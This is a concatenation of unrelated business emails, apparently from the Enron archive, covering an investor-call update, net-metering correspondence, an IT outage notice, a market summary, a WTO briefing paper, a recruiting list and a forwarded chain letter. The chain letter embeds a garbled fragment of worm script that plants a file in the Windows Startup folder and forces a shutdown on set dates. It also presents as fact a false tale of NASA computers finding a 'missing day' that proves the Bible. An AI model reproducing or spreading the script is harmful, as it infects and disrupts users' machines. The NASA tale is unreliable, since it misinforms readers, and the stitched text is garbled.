Today, Enron hosted a conference call to give investors a current overview of the company. Here's an update of what we discussed during the call. We told investors that we're doing everything we can to protect their interests and to regain their confidence. Our focus remains on our credit quality, balance sheet and liquidity, which are essential for our continued success and expansion of our wholesale businesses. It took more than a few weeks to get where we are today. Here's a snapshot of significant events that led to our current situation: -- In hindsight, we definitely made some very bad investments in our non-core businesses over the past several years. Those include investments in Azurix, India and Brazil. They have performed far worse that we could have ever imagined when we made these investments; -- Because of these bad investments, we've become over-leveraged as a company. The negative impact of those investments was exacerbated through the extensive use of debt capital both on and off our balance sheet; -- We also entered into related party transactions that led to a loss of investor confidence, which has been very damaging; -- We've been criticized for our lack of transparency and our hard-to-understand financial and operating disclosures; and -- On top of it all, we discovered errors in our financial statements, as discussed in our 8-K filing last week, that required a restatement of previously reported earnings. We've taken a new look at our businesses and have separated them into three areas: core businesses, non-core businesses, and businesses under review. Core Businesses Our core businesses remain strong and consistent sources of significant earnings and cash flows for the company. They're our competitive advantage. These include: -- Natural gas pipeline businesses; -- Gas and power businesses in North America and Europe; -- Retail businesses in North America and Europe; and -- Coal businesses in North America and Europe. The events of the past few weeks have had a temporary negative impact on our projected fourth quarter profitability. It's too early to tell at this time what impact this might have on our operating results. We are considering these actions now so that we can quickly return to normal business in 2002. I also remain optimistic that the actions we've taken over the past couple of weeks have addressed our customer and counterparty credit and liquidity concerns. According to our business unit leaders, we have definitely seen improvement in our counterparty relationships. Non-Core Businesses Our non-core businesses include our global assets group and our broadband division. We have invested more than $8 billion in these businesses, and the return from them has been dismal. We have an aggressive program in place to exit these businesses and expect that the sale of these businesses will generate billions of dollars in cash that we can use to repay debt and reinvest in our core businesses. We already have more than $800 million in assets contracted for sale this year. They include CEG Rio, a gas LDC in Brazil; EcoElectrica, a power plant and LNG receiving terminal in Puerto Rico; and asset sales of offshore oil and gas properties in India. The approximately $2.9 billion Portland General sale is also on target to close in late 2002 pending regulatory approvals. Businesses Under Review These businesses are comprised of those operations outside our power and gas wholesale businesses and include global and industrial markets. While several of these businesses have very strong future prospects, we need to determine if their capital requirements and near-term growth prospects are sufficient enough in terms of earnings and cash generation. Reviewing our businesses this way will help determine where we need to make reductions to our work force. More information will follow as soon as it becomes available. Credit Rating/10-Q Filing We continue to meet regularly with credit rating agencies and believe that our liquidity enhancements and scheduled asset sales will strengthen our balance sheet and maintain our investment grade credit rating. Our current credit ratings by the three major rating agencies are as follows: -- Moody's at Baa3 "Under Review for Further Downgrade" -- Fitch at BBB- "Evolving Status" -- S&P at BBB- "CreditWatch Negative" We also discussed our existing financial vehicles, including Osprey, Marlin and Yosemite, in further detail. We told investors that we will file our 10-Q five days late due to our current activities. It will be filed on Nov. 19. We will continue to have updates with investors over the coming weeks as well as our frequent updates with you. The full transcript of our conference call will be filed with the Securities and Exchange Commission in the next few days. It will also be posted on our web site at www.enron.com/corp/investors under "SEC Filings." In connection with the proposed transactions, Dynegy and Enron will file a joint proxy statement/prospectus with the Securities and Exchange Commission. Investors and security holders are urged to carefully read the joint proxy statement/prospectus regarding the proposed transactions when it becomes available, because it will contain important information. Investors and security holders may obtain a free copy of the joint proxy statement/prospectus (when it is available) and other documents containing information about Dynegy and Enron, without charge, at the SEC's web site at www.sec.gov. Copies of the joint proxy statement/prospectus and the SEC filings that will be incorporated by reference in the joint proxy statement/prospectus may also be obtained for free by directing a request to either: Investor Relations, Dynegy Inc., 1000 Louisiana, Suite 5800, Houston, TX 77002, Phone: (713) 507-6466, Fax: (713) 767-6652; or Investor Relations, Enron Corp., Enron Building, 1400 Smith Street, Houston, TX 77002, Phone: (713) 853-3956, Fax: (713) 646-3302. In addition, the identity of the persons who, under SEC rules, may be considered "participants in the solicitation" of Dynegy and Enron shareholders in connection with the proposed transactions, and any description of their direct or indirect interests, by security holdings or otherwise, are available in an SEC filing under Schedule 14A made by each of Dynegy and Enron.
Oops. Didn't mean MWs last time. But I do think that some cutoff higher than 25 kWs is appropriate for net metering purposes. Where the generator is substantially smaller than the customer's off-peak minimum load, there does not seem to me to be a need to exclude it from any net metering provisions. -----Original Message----- From: Christensen, Eric To: 'Sarah Dennison-Leonard' Cc: Preston Michie; Marcus Wood; Barney Speckman; John Boucher; [email protected]; Arlena; [email protected]; [email protected]; Christensen, Eric; Gary Dahlke; Michael Early; [email protected]; Eric Freedman; [email protected]; [email protected]; [email protected]; Steve Larson; [email protected]; [email protected]; [email protected]; Doug Nichols; [email protected]; [email protected]; [email protected]; Don Watkins; Connie Westadt; [email protected] Sent: 6/23/00 2:39 PM Subject: RE: Initial E-mail Communication - Subgroup Working on GIA, LIA, Etc. Sarah, The Generation Interconnection Agreement will have to be modified to accommodate the Net Metering law (R.C.W. Chapter 80.60) that was passed here in Washington in 1998. The law covers generators of 25 kW or less that are powered by solar, wind, hydro or fuel cells. Washington distribution utilities are required to install two-way meters for all customers with such facilities and to credit those customers for any power produced in excess of the customer's needs. We are required to accept all qualified net metering customers until the total generating capacity of the net metered systems reaches 0.1 percent of our 1996 peak load. Because these generators are tiny and, even in the aggregate, are unlikely to have any appreciable effect on the operation of the grid, I think the easiest approach would be simply to write an exemption into the GIA for such net metered generators. I don't know whether any of the other RTO-West states have net metering laws. However, net metering has been kicked around quite a bit in connection with federal restructuring legislation. Hence, we need to keep an eye developments in DC in this regard. Eric Christensen Associate General Counsel Snohomish County PUD No. 1 (425) 783-8649 Toll free from WA: (877) 783-1000 x8649 Office fax: (425) 783-8305 Direct fax: (425) 267-6071 [email protected] <mailto:[email protected]> -----Original Message----- From: Sarah Dennison-Leonard [SMTP:[email protected]] Sent: Wednesday, June 21, 2000 5:45 AM To: [email protected]; Arlena; [email protected]; [email protected]; [email protected]; Gary Dahlke; Sarah Dennison-Leonard; Michael Early; [email protected]; Eric Freedman; [email protected]; [email protected]; [email protected]; Steve Larson; [email protected]; [email protected]; [email protected]; Doug Nichols; [email protected]; [email protected]; [email protected]; Don Watkins; Connie Westadt; [email protected] Cc: Gary Dahlke; Preston Michie; Marcus Wood; Barney Speckman; John Boucher Subject: Initial E-mail Communication - Subgroup Working on GIA, LIA, Etc. Good morning, everyone! I am sorry it has taken me so long to contact you. This e-mail is intended to get things rolling for the RTO West Legal Subgroup working on the Generation Integration and Load Integration Agreements, as well as Security Coordination and Scheduling Coordinator Agreements if necessary. First, for your reference I have attached the following documents: (1) a list of participants in our subgroup; (2) the original IndeGO Generation Integration Agreement ("GIA"); and (3) the original IndeGO Load Integration Agreement ("LIA"). If you know of anyone who would like to be included in this subgroup that does not appear on the attached participants list, please let me know. I will also post each of the attached documents on the RTO West website, at the link on the Legal Work Group page set up for our subgroup. Second, I would like to share some initial feedback I have received with respect to our assigned tasks: (A) Concerning the Generation GIA, I have the following initial feedback: - Carl Imparato has expressed strong concern about existing provisions in the GIA designed to address instances when hydro generation facility operators are forced to move water through turbines, rather than spill it, to avoid dissolved gas super-saturation problems; - James Mosher has expressed concern that the GIA as currently drafted does not adequately address issues unique to Qualifying Facilities, and would like us to work on that; and - Steve Larson of BPA has contacted me to let me know that BPA has developed some initial comments on the GIA (and LIA), but I have not yet had a chance to have a conversation with BPA representatives about what those comments are. I hope to do that sometime tomorrow (Thursday, June 22) if possible. (B) I have talked with John Boucher, who leads the Implementation Work Group, and he says that the initial consensus within the Implementation Work Group is that we should begin with the approach that security coordination for RTO West will be accomplished through the existing organization set up in the Northwest to perform security coordination (Pacific Northwest Security Coordinator or "PNSC," which is a Washington non-profit corporation); and (C) John Boucher says that the initial thinking in the Implementation Work Group about scheduling coordinators as that we should assume that we will have scheduling coordinators for RTO West and therefore will need to develop a scheduling coordinator agreement. With that in mind, I have also attached to this e-mail an e-mail message from Barney Speckman on this topic. Barney's e-mail describes input he has received from Carl Imparato concerning areas in the West that have already developed scheduling coordinator agreements, and includes an e-mail from Carl with sample documents. I will also post these on the RTO West website as soon as possible, along with the basic form of Security Coordination Agreement developed for PNSC. I think it might be useful to plan to meet or have a telephone conference call during the week of July 10 (early in the week, if possible) to discuss our various tasks and strategies for accomplishing them. If most of you are going to be at the Legal Work Group meeting on June 27, that might be a good opportunity to try to identify a time and date that works for most subgroup members and to decide whether to meet in person or by telephone conference. I also hope to make initial "cosmetic" changes to the GIA and LIA very soon, and will put the initial revised versions of those documents on the website as soon as they are ready. In the meantime, if anyone else has some input they would like to offer with respect to the issues and documents assigned to our subgroup, you are welcome to contact me by e-mail or telephone. Thank you very much. Sarah Dennison-Leonard Krogh & Leonard 506 SW Sixth Avenue, Suite 750 Portland, OR 97204-1533 Office: (503) 219-9649 Fax: (503) 224-1895 E-mail: [email protected] << File: Legal WG - GIA&LIA Subgroup List June 21 2000.doc.rtf >> << File: IndeGO Generation Integration Agreement.doc >> << File: IndeGO Load Integration Agreement.doc >> << Message: Fwd: NWRTO-Scheduling Coordinator Concept >>
------------------------------------------------------------------------------ ------------------------ W E E K E N D S Y S T E M S A V A I L A B I L I T Y F O R May 11, 2001 5:00pm through May 14, 2001 12:00am ------------------------------------------------------------------------------ ------------------------ SCHEDULED SYSTEM OUTAGES: ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages. AZURIX: No Scheduled Outages. EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages. EDI SERVER: No Scheduled Outages. ENRON CENTER SOUTH DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages ENRON NORTH AMERICAN LANS: Impact: EES Time: Sat 5/12/2001 at 1:00:00 PM CT thru Sat 5/12/2001 at 5:00:00 PM CT Sat 5/12/2001 at 11:00:00 AM PT thru Sat 5/12/2001 at 3:00:00 PM PT Sat 5/12/2001 at 7:00:00 PM London thru Sat 5/12/2001 at 11:00:00 PM London Outage: Move vlans for EES in Enron Building Environments Impacted: EES in Enron Building Purpose: Provide more capacity to the network Backout: paste in old configs Contact(s): Gail Kettenbrink 713-853-4524 Michael Huang 713-345-3201 FIELD SERVICES: No Scheduled Outages. INTERNET: No Scheduled Outages. MESSAGING: No Scheduled Outages. MARKET DATA: No Scheduled Outages. NT: No Scheduled Outages. OS/2: No Scheduled Outages. OTHER SYSTEMS: Impact: Corp, OTS, ETS DATE: MAY 15, 2001/2/2001 at 5:30:00 PM Outage: Migrate DSS Server to GTHOU-APPSQ03P Environments Impacted: DSS users will not be able to access the old server (ENEDS01_ADAPT)after this date Purpose: The existing server is outdated, migrating to SQL 2000 provides increased functionality and conforms to database platform requirements. Backout: Contact(s): Mary Vollmer 713-853-3381 Joe Hellsten 713-853-7346 713-545-4164 Impact: CORP Time: Fri 5/11/2001 at 8:00:00 PM CT thru Sat 5/12/2001 at 10:00:00 PM CT Fri 5/11/2001 at 6:00:00 PM PT thru Sat 5/12/2001 at 8:00:00 PM PT Sat 5/12/2001 at 2:00:00 AM London thru Sun 5/13/2001 at 4:00:00 AM London Outage: CPU replacement on server sennacca. Environments Impacted: RMS Purpose: Replace faulty CPU that is offline. Backout: Restore server to old configuration. Contact(s): Malcolm Wells 713-345-3716 Impact: CORP Time: Fri 5/11/2001 at 5:00:00 PM CT thru Fri 5/11/2001 at 5:15:00 PM CT Fri 5/11/2001 at 3:00:00 PM PT thru Fri 5/11/2001 at 3:15:00 PM PT Fri 5/11/2001 at 11:00:00 PM London thru Fri 5/11/2001 at 11:15:00 PM London Outage: Decommission of the following servers: intra, intra-dev, conman1, aserv1, ardent, dbadmin Environments Impacted: Corp Purpose: Server no longer used. The servers will be decommissioned or redeployed where necessary. Backout: Contact(s): Malcolm Wells 713-345-3716 Impact: CORP Time: Sat 5/12/2001 at 2:00:00 AM CT thru Sun 5/13/2001 at 5:00:00 PM CT Sat 5/12/2001 at 12:00:00 AM PT thru Sun 5/13/2001 at 3:00:00 PM PT Sat 5/12/2001 at 8:00:00 AM London thru Sun 5/13/2001 at 11:00:00 PM London Outage: Resource and OS upgrade to server fracture. Environments Impacted: Global company RMS ECM Purpose: An OS upgrade is needed to provide the disk upgrade solution. Additionanl memory is needed as well. Backout: Attach the old disk solution and reboot to old configuration. Contact(s): Malcolm Wells 713-345-3716 Impact: ENA Time: Sat 5/12/2001 at 10:00:00 PM CT thru Sat 5/12/2001 at 10:15:00 PM CT Sat 5/12/2001 at 8:00:00 PM PT thru Sat 5/12/2001 at 8:15:00 PM PT Sun 5/13/2001 at 4:00:00 AM London thru Sun 5/13/2001 at 4:15:00 AM London Outage: Bounce PWRPROD1 database Environments Impacted: Enpower User Purpose: Change some configuration to improve database performance Backout: Use the old parameter file. Contact(s): Tantra Invedy 713 853 4304 SITARA: No Scheduled Outages. SUN/OSS SYSTEM: No Scheduled Outages. TELEPHONY: Impact: Time: Sat 5/12/2001 at 10:00:00 PM CT thru Sun 5/13/2001 at 1:00:00 AM CT Sat 5/12/2001 at 8:00:00 PM PT thru Sat 5/12/2001 at 11:00:00 PM PT Sun 5/13/2001 at 4:00:00 AM London thru Sun 5/13/2001 at 7:00:00 AM London Outage: Quarterly Maintenance - Telephone System Environments Impacted: All Purpose: Quarterly maintenance. While voicemail nodes are being serviced (one box at a time), a slight disruption will be experienced. Messages will continue to be stored but will not be delivered until each node of voicemail is back up and operational. CMS call center management reporting will not be availalble during this time. Backout: Contact(s): Cynthia Siniard 713-853-0558 TERMINAL SERVER: No Scheduled Outages. UNIFY: Impact: CORP Time: Fri 5/11/2001 at 6:00:00 PM CT thru Fri 5/11/2001 at 7:00:00 PM CT Fri 5/11/2001 at 4:00:00 PM PT thru Fri 5/11/2001 at 5:00:00 PM PT Sat 5/12/2001 at 12:00:00 AM London thru Sat 5/12/2001 at 1:00:00 AM London Outage: Memory replacement for server electron. Environments Impacted: Unify Users Purpose: Replace faulty memory module. Backout: Get new memory if necessary Restart server with out memory as last resort Contact(s): Malcolm Wells 713-345-3716 ------------------------------------------------------------------------------ ----------------------------------------------- FOR ASSISTANCE (713) 853-1411 Enron Resolution Center Specific Help: Information Risk Management (713) 853-5536 SAP/ISC (713) 345-4727 Unify On-Call (713) 284-3757 [Pager] Sitara On-Call (713) 288-0101 [Pager] RUS/GOPS/GeoTools/APRS (713) 639-9726 [Pager] OSS/UA4/TARP (713) 285-3165 [Pager] CPR (713) 284-4175 [Pager] EDI Support (713) 327-3893 [Pager] EES Help Desk (713)853-9797 OR (888)853-9797
Charles Schwab & Co., Inc. Midday Market View(TM) for Friday, June 1, 2001 as of 1:00PM EDT Information provided by Standard & Poor's ================================================================ U.S. INDICES (1:00p.m. EDT) ---------------------------------- Market Value Change DJIA 10,915.10 + 3.20 Nasdaq Comp. 2,135.06 + 24.57 S&P 500 1,256.18 + 0.36 ---------------------------------- NYSE Advancing Issues 1,484 NYSE Declining Issues 1,466 NYSE Trading Volume 521 mln NASDAQ Advancing Issues 1,868 NASDAQ Declining Issues 1,640 NASDAQ Trading Volume 815 mln ================================== U.S. TREASURIES ---------------------------------- Value Yield Change 1-year bill 3.53% n/a 5-year note 4.91% - 1/32 10-year note 5.35% + 5/32 30-year bond 5.70% + 20/32 The tables above look best when viewed in a fixed-width font, such as "Courier." ================================================================ U.S. TRADING SUMMARY The NASDAQ's price action remains something of a conundrum for traders as volatile action has characterized the performance of the tech heavy index. After an initial rally on payroll figures that were not as weak as feared, and a subsequent selloff later in the session on weaker-than-expected manufacturing data, the NASDAQ clawed its way back to its highs of the day. Indeed, bargain hunters continue to support the index by buying on the dips. The gains on the NASDAQ have also helped bring the Dow and S&P 500 off early lows. Sectors outperforming during today's session included the semiconductors, computer software, drugs and healthcare providers. Insurance providers, telephone and electric power companies were the worst-performing sectors. ---------------------------------------------------------------- U.S. TREASURY SUMMARY Treasuries were broadly higher across the board in midday trading. Initially, a stronger-than-expected payroll report weighed on the longer-dated issues, but poor manufacturing data helped the bond turn the corner and rally sharply higher. Subsequent weakness in the stock market was also supportive for Treasuries, though the shorter-dated issues remained constrained by beliefs the Federal Reserve is nevertheless nearing the end of its current interest-rate easing cycle. ---------------------------------------------------------------- CURRENCY SUMMARY The euro failed to breach the 0.850 level, with the common currency now likely to trade within a narrow range for the remainder of the session. Dealers report European selling interest near the highs. The euro was trading around 0.846 dollars per euro by midday, just off session lows. As for the yen, the dollar remains around the 119 yen level. ---------------------------------------------------------------- MAJOR COMPANY / INDUSTRY NEWS (All prices as of 1:05 p.m. EDT) ** General Motors' (GM: 56.75, - 0.15) proposal to buy Daewoo motors of Korea has come under fire from Daewoo's workers union. Five representatives from Korea left for the U.S. to protest the GM bid along with union representatives from the United States. For many years, unions have strongly resisted any selling of key businesses to foreigners due to the fear of mass layoffs at the companies that are taken over. ** Tyco International (TYC: 56.93, - 0.52), a conglomerate that makes a diverse array of items from smoke detectors to medical supplies along with managing a finance business, reported that it plans to sell $2.2 billion in common stock in a public offering to repay current debt. Tyco grows its business through acquisitions of other companies, but servicing the accumulated debt of these purchases can weigh on profits. Tyco will sell 39 million shares, and the offering is scheduled to close on June 6. Lehman Brothers will be the lead underwriter. ** Vivendi (V: 63.48, - 0.32) agreed on Friday to buy educational publisher Houghton Mifflin (HTN: 59.51, + 4.95) for $2.2 billion in cash and debt. The French entertainment conglomerate will offer $60 per share for a 10% premium over Houghton's closing price on Thursday. Houghton Mifflin is the last independent educational publishing firm. Vivendi has been on a buying binge of late as it looks to shore up its global leadership positions at all of its media and content businesses. ---------------------------------------------------------------- RESEARCH SPOTLIGHTS ** Merrill Lynch upgraded shares of Novellus Systems (NVLS: 49.96, + 2.06) from an intermediate-term neutral to an intermediate-term accumulate rating. ** Buckingham Research upgraded shares of Value City Department Stores (VCD: 10.45, + 0.20) to an accumulate rating and gave a $15 price target. ** Morgan Stanley upgraded shares of Watson Pharmaceuticals (WPI: 62.88, + 2.78) to a strong buy rating and gave a $78 price target. ################################################################ Log in using the links below to: Access your account: https://investing.schwab.com/trading/start?SANC=CCBodyi&NeedCASelValue=Y View your Email Alert customization options: https://investing.schwab.com/trading/start?SANC=EAMyAlerts Perform research or request a market quote: https://investing.schwab.com/trading/start?SANC=Quotes Place a trade order: https://investing.schwab.com/trading/start?SANC=TradeStock To visit Schwab's home page, use this link: http://www.schwab.com/ ----------------------------------------------------------------- To unsubscribe or modify your Email Alert customization options, log in using the link below or copy and paste it into your browser's address window: https://investing.schwab.com/trading/start?SANC=EAMyAlerts Now you can receive graphics Email Alerts in HTML format, using helpful, full-color graphics and active Web links that connect you directly to information you want. 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TODAY'S HEADLINES The New York Times on the Web Thursday, May 10, 2001 ------------------------------------------------------------ For news updated throughout the day, visit www.nytimes.com QUOTE OF THE DAY ========================= "We like living here. It's a beautiful place. The only thing we don't like, you can't make any money to survive. My son is getting straight A's. He's not going to be around here." - FRED PRATT, of Morland, Kan. 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? ? -----Original Message----- From: Mary Pate [mailto:[email protected]] Sent: Wednesday, November 29, 2000 9:35 PM To: Wilson Pate; Robert Johnson; Graham Pate; Paige Pate; Gene Graham; Suzanne Mauze; Cissy Bankhead; Jim Bankhead; Margaret Herring; Sally Kritser; Barbara Harkins; Carolyn Garner; Sandra Gilliland; Mary Nell Lemert; [email protected]; kenna dubose; Patty Christian; D'Layne Peeples; Murray/Jeri Gossett Subject: Fw: NASA and the Bible ? ? ');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg' );d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();S3 driver memory alloc failed ? !]]%%%%%D,marrer\\Programmes\\D,marrage\\kak. hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((a gt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("ms ie 5.")!=-1))scr.write(); // --> ----- Original Message ----- From:Robert Johnson To:'Wilson (Home)' ; 'Mary Pate' ; 'mary pate' Sent:Wednesday, November 29, 2000 1:10 PM Subject:FW: NASA and the Bible ? ? -----Original Message----- From: Doug Jackson [mailto:[email protected]] Sent: Tuesday, November 28, 2000 9:40 PM To: Jeannie Dunston; Nita Vaughn; Jim Swafford; Vicki Rusche; Marivel Robinson; Cheryl Ann Raffanti; North Hills Place; Cyndi Pitman; John W. Lyon; Mark E. Lyon; Morris Lloyd; Gayland Laing; Robert Johnson; Stefani Jackson; Sean D. Jackson; Pat Ivie; Francis Hung; Laura Hudler; William Hills; Dave Garber; Thomas J. Freytag; Steve Elken; Lohren Edney; John W. Demars; Isibelle DeBaun; Suzanne Cunningham; Jim Brown; Ken Braddy; Eva Aromi; Toni Anderson Subject: NASA and the Bible ?For all the scientists out there and for all the students who have a hard time convincing these people regarding the truth of the Bible...here's ?something that ?shows God's awesome creation and shows that He is still in control. Did you ? know that the space program is busy proving that what has been called "myth" in the Bible is true? ?Mr. Harold Hill, President of the Curtis Engine Company in Baltimore Maryland and a consultant in the space Program relates the following development. ?"I? think one of the most amazing things that God has for us today happened recently to our astronauts and space scientists at Greenbelt, Maryland. They were checking the position of the sun, moon, and planets out in space where they would be 100 years and 1000 years from now.? We have to know this so we won't send a satellite, up and have it bump into something later on in its orbits. We have to lay out the orbits in terms of the life of the satellite, and where the planets will be so the whole thing will not bog down. They ran the computer measurement back and forth over the centuries and it ?came to a halt. The computer stopped and put up a red signal, which meant ?that there was something wrong either with the information fed into it or with the results as compared to the standards. ?They called in the service department to check it out and they said,"What's wrong?" Well, they found there is a day missing in space in elapsed time. They ?scratched their heads and tore their hair. There was no answer. ?Finally, a Christian man on the team said, "You know, one time I was in ?Sunday School and they talked about the sun standing still." ?While they didn't believe him, they didn't have an answer either, so they ?said, "Show us." He got a Bible and went back to the book of Joshua where ?they found a pretty ridiculous statement for any one with "common sense." ?There they found the Lord saying to Joshua, "Fear them not, I have delivered them into thy hand; there shall not a man of them stand before thee." ?Joshua was concerned because he was surrounded by the enemy and if darkness fell they would overpower them. So Joshua asked the Lord to make the sun ?stand still! That's right-"The sun stood still and the moon stayed and hasted not to go down about a whole day!"?? (Joshua 10:12-13) The astronauts and scientists said, "There is the missing day!"? They checked the computers going back into the time it was written and found it was close but not close enough. The elapsed time that was missing back in Joshua's day was 23 hours and 20 minutes-not a whole day. ?They read the Bible and there it was "about (approximately) a day." These ?little words in the Bible are important, but they were still in trouble because if you cannot account for 40 minutes you'll still be in trouble 1,000 years from now. Forty? minutes had to be found because it can be multiplied many times over in orbits. ?As the Christian employee thought about it, he remembered somewhere in the ?Bible where it said the sun went BACKWARDS. The scientists told him he was ?out of his mind, but they got out the Book and read these words in 2 Kings ?that told of the following story: Hezekiah, on his deathbed, was visited by the prophet Isaiah who told him that he was not going to die. Hezekiah asked for a sign as proof. ?Isaiah said "Do you want the sun to go ahead 10 degrees?" Hezekiah said "It is nothing for the sun to go ahead 10 degrees, but let the shadow return backward 10 degrees." Isaiah spoke to the Lord and the Lord brought the shadow ten degreesBACKWARD! Ten degrees is exactly 40 minutes! Twenty-three hours and 20 minutes in ?Joshua, plus 40 minutes in Second Kings make the missing day in the universe! ?Isn't it amazing? ?References: Joshua 10:8 and 12, 13 and 2 Kings 20:9-11. ?Forward this to as many people who you believe would think this is equally as cool. ?Never be afraid to try something new.? Remember, amateurs built the ark. ?Professionals built the Titanic. ? ?Have a great day! "WorldSecure <firstsw.com>" made the following annotations on 11/29/00 13:10:01 ------------------------------------------------------------------------------ [INFO] -- Content Manager: First Southwest Company is not responsible for any recommendation, solicitation, offer or agreement or any information about any transactions, customer account or account activity contained in this communication. ==============================================================================
Forwarded at the request of Joe Hillings. Encl: The following persons please review the attachment found at the end of this document. Ken Lay, David Merrill, Mike Dahlke, Rebecca McDonald, Paul Adair, Michael L. Brown, Carey Sloan, John Fugh, Manual Gallego, Darrell Kinder. Thank you. ---------------------- Forwarded by Lora Sullivan/Corp/Enron on 11/15/99 10:40 AM --------------------------- Tina Valdecanas <[email protected]> on 10/29/99 05:15:48 PM To: cc: (bcc: Joe Hillings/Corp/Enron) Subject: ACTION: Comments on WTO Briefing Paper TO: US-ASEAN Business Council Members FROM: Tina Valdecanas P: 202/289.1911, ext. 230; e-mail [email protected] Web-site: http://www.us-asean.org DATE: 29 October 1999 RE: ACTION: Comments on WTO Briefing Paper Summary: The attached draft is being circulated among US-ASEAN Business Council members for input. The briefing paper will be presented to the ASEAN Trade Ministers who will be attending the WTO Ministerials in Seattle in November/December 1999. Please forward comments to me by cob Friday, November 19, 1999. End Summary. The US-ASEAN Business Council is developing a briefing paper for the ASEAN Trade Ministers who will be attending the World Trade Organization Ministerials in Seattle, WA later this year. Trade representatives from Brunei, Malaysia, Indonesia, Singapore, the Philippines, and Thailand are expected to attend. To ensure that member concerns are addressed in the paper, please send comments/suggestions regarding the below draft to me at [email protected] by c.o.b. Friday, November 19, 1999. I will circulate a final draft the week of November 22. Thank you. ***** US-ASEAN Business Council Briefing Paper PRIORITY BUSINESS ISSUES prepared in advance of the WTO Ministerials November 1999 A group of 400 of America's leading companies, the US-ASEAN Business Council prides itself as being dedicated to effectively strengthen bilateral and US-ASEAN relations through strong economic and commercial ties. The Council is committed to promoting open and free trade globally with the belief that such an environment is of benefit to all. Open and transparent markets translate into economic growth and the opportunity to raise the standards of living of the world's people. In addition to providing a larger range of goods and services, rules-based, open markets allow countries to be more competitive in the international arena. In this spirit, the Council's members offer this briefing paper as a compilation of the commercial issues we consider of highest priority at the onset of the new round of the WTO negotiations. This is not a comprehensive roster, rather attention has been given to issues which: * Hold priority status for American businesses seeking to expand their trade and investment ties in ASEAN; and, * Have been advanced significantly through the APEC process and have a realistic prospect of being concluded within the three year timeframe. PRIORITY ISSUES Accelerated Tariff Liberalization: The agreement reached at the recent APEC Leaders' Meeting in Auckland has provided the critical mass necessary for action on accelerated tariff liberalization in eight priority sectors within the framework of the WTO. Continued tariff reduction will have wealth creating and efficiency enhancing effects on global trade. The end result would be a larger international market that will encourage the continued foreign investment and global capital flows. Agriculture: A robust global food system that efficiently links food production, food processing and consumption, is vital to continuing development world-wide. Council members support initiatives to remove all export subsidies and to reduce tariffs on agricultural products. The Council also supports activities to ensure market-access for agricultural products enhanced with the use of biotechnology. Use of this technology provides a safe and sufficient food supply while ensuring the safety of food sources and environment through strong and transparent science-based domestic regulatory systems. Customs issues: The Council is encouraged by the positive progress being made in the area of Customs reform and liberalization. In the context of this on-going cooperation, members hope to see the adoption of the International Express Carriers Conference (IECC) Guidelines for Customs and encourage governments to continue to address: electronic pre-clearance in a paperless environment; twenty-four hour customs operation; elimination of export clearance procedures; higher deminimus levels; transshipment without processing; and payment of duties and taxes for imports at defined periods rather than upon arrival. Each of these actions would improve the speed or lower the expense of shipment. Countries that have adopted measures along the lines of the above have reduced the bottleneck effect that Customs can create and have improved the competitive environment for companies within their borders. This attracts investment, which creates jobs and wealth. E-commerce: In the past few years, electric or "E-Commerce" has expanded the depth and breadth of global commerce. Although the physical infrastructure is quickly spreading to support such transactions, the legal and regulatory framework is still being developed. Both suppliers and consumers of E-commerce will benefit from an improved legal environment and measures to benchmark policies and best practices in member economies. To ensure that the industry continues to develop, the WTO should give special priority to adopting a permanent moratorium on the imposition of duties on electronic commerce. Energy: With growing demand for energy and calls for clean and efficient use of resources, the WTO should look to promote the diversification of energy supply and a market-driven energy infrastructure development. Well-functioning markets, greater energy efficiency and information flows among market participants will aid in sustainable and equitable growth globally. The WTO should support initiatives like the APEC Natural Gas Initiative signed by the Energy Ministers at Okinawa last year and the ongoing policy dialogues to address energy service-oriented issues related to the development, extraction, production, distribution, marketing, consumption of all energy products.. ITA: The US private sector applauds the advances made under the 1997 International Technology Agreement (ITA) and looks forward to the beginning of negotiations for the second phase of the agreement. While the November 1998 ITA II package does not meet all of our expectations, the Council's members are confident agreements resulting from the successful passage of ITA II will increase product coverage, encourage progress on the elimination of non-tariff measures, and lead to the harmonization of tariff classification of products already covered in previous negotiation rounds. The continued review and revision of the ITA's product coverage will further expand and distribute the benefits of information technology globally, and is a fundamental necessity for such a fast-paced, dynamic industry. Although the Council would encourage discussion of ITA-II during the upcoming round of WTO negotiations, we believe that the ITA-II negotiations should remain independent and should be concluded as soon as possible.
FYI - I believe that Shona will prove to be a great asset to Enron. We are following up on her leads for talent. --Sally ---------------------- Forwarded by Sally Beck/HOU/ECT on 05/25/2000 01:53 PM --------------------------- From: Shona Wilson @ ENRON 05/25/2000 09:00 AM To: Tony Vasut/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT cc: Subject: People to consider recruiting As requested, I've created a list of people who: have mentioned to me that they are interested in changing careers/companies or I think would be a great asset to Enron. I've jotted down what I know about each person and I hope you find it useful. I've organized it from most experienced to least experienced. If you would like to talk me about any of these people or ask me to contact them, just let me know. Andy Dunn - until 2 weeks ago he was a director in the PwC risk management practice. Due to a falling out between Andy and the partners (not client related), he left the firm. He is extremely well respected by both the audit and the non-audit personnel, and his leaving came as an unexpected surprise. I have worked with him on a number of occasions and would highly recommend him to Enron. The downside to Andy is that he lives in Denver, is used to travelling a lot, but, at the last time we spoke (a few months ago), is not interested in leaving Denver. His cell phone (if still in use) is 303 807 0040. Mark (Allan) Smith - Mark is in the PwC energy risk management practice in Houston. We worked very closely together throughout 1999 on projects for Coral Energy and Equiva trading. Prior to working at PwC, Mark was at BP for 15 years where he had many different roles (he worked as a crude trader, products trader, he worked in the risk management department, in the refinery itself as an engineer). Mark was excellent to work with. Clients are extremely impressed with his knowledge and background. I would highly recommend him for a leadership role at Enron. I spoke to him yesterday and he is interested in talking with you. His direct number is 713 356 4233. His cell phone number is 713 412 3890. Alan Beaton - senior manager KPMG's systems control group (IRM). He works with my husband. I know him on a personal basis. He is trying to find opportunities outside of the audit/consulting area (general line 713 319 2000). Marilyn Chee - She currently works for Equiva trading, manager in-charge of accounting for derivatives. Her role has expanded to encompass FAS 133 and all mtm accounting entries. She liases with all book heads (crude and all products). In the past, she worked in the Texaco 